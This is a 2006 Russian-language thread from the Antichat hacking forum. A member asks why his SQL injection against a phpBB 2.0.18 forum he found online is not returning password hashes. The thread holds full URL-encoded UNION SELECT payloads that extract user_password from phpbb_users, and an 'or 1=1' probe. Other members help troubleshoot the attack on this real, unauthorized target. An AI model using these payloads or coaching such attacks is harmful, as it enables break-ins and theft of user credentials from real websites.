Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопрос насчет sql injection. (https://forum.antichat.xyz/showthread.php?t=17506)

Lord Nikon 11.04.2006 16:16

Вопрос насчет sql injection.
 
Я хотел бы узнать почему не получается провести sql injection,понимаю мембер ачата уже должен наизусть выучить все это и с этим у него не должно быть никаких проблем,но у мя возникли (может из за моей невнимательности).
Вот код
index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null%20FR OM%20phpbb_users%20Where%20user_id=айди юзера/* я нашел форум и решил попробовать на нем,как всегда у мя ничего не вышло =).Он после запроса выкидавал выкидывал на гшлавнубю страницу форума,то есть ни хеша ничего мне не выдает.Кстати форум на движке phpbb 2.0.18.
Спасибо за помощь.Не ругайтесь пожалуйста.=)

Nemesis 12.04.2006 21:03

А кто сказал что префикс phpbb? и вообще, запрос может быть вполне неверен...

Lord Nikon 12.04.2006 21:20

ну извини я сначало видео посмотрел а потом поробовал.

Lord Nikon 12.04.2006 23:44

Народ в чем же ошибка?

max_pain89 12.04.2006 23:47

может профиксили? попробуй просто -99+or+1=1 че будет

+toxa+ 13.04.2006 00:04

У меня так всё работает...
Код:

index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=[тут id]/*
ЗЫ чё-то как-то пробелы сами добавляются....

Lord Nikon 13.04.2006 03:57

Цитата:

Сообщение от max_pain89
может профиксили? попробуй просто -99+or+1=1 че будет

он меня так же выкидывает на index.php.Ничего не происходит.
Цитата:

Сообщение от +toxa+
У меня так всё работает...
Код:

index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=[тут id]/*
ЗЫ чё-то как-то пробелы сами добавляются....

ты имеешь ввиду у тя таким образом все получается?

Desr0w 13.04.2006 04:12

Цитата:

Сообщение от +toxa+
У меня так всё работает...
Цитата:

ты имеешь ввиду у тя таким образом все получается?
Судя по ответу работает-соответственно получается:)

SanyaX 13.04.2006 08:10

Мемберы античата не все разбираються в sql.

Lord Nikon 13.04.2006 16:10

успокойся,если не хочешь чтоб я был в мемберах так и скажи =)

Насчет вопроса - получается что профиксили?


Время: 23:38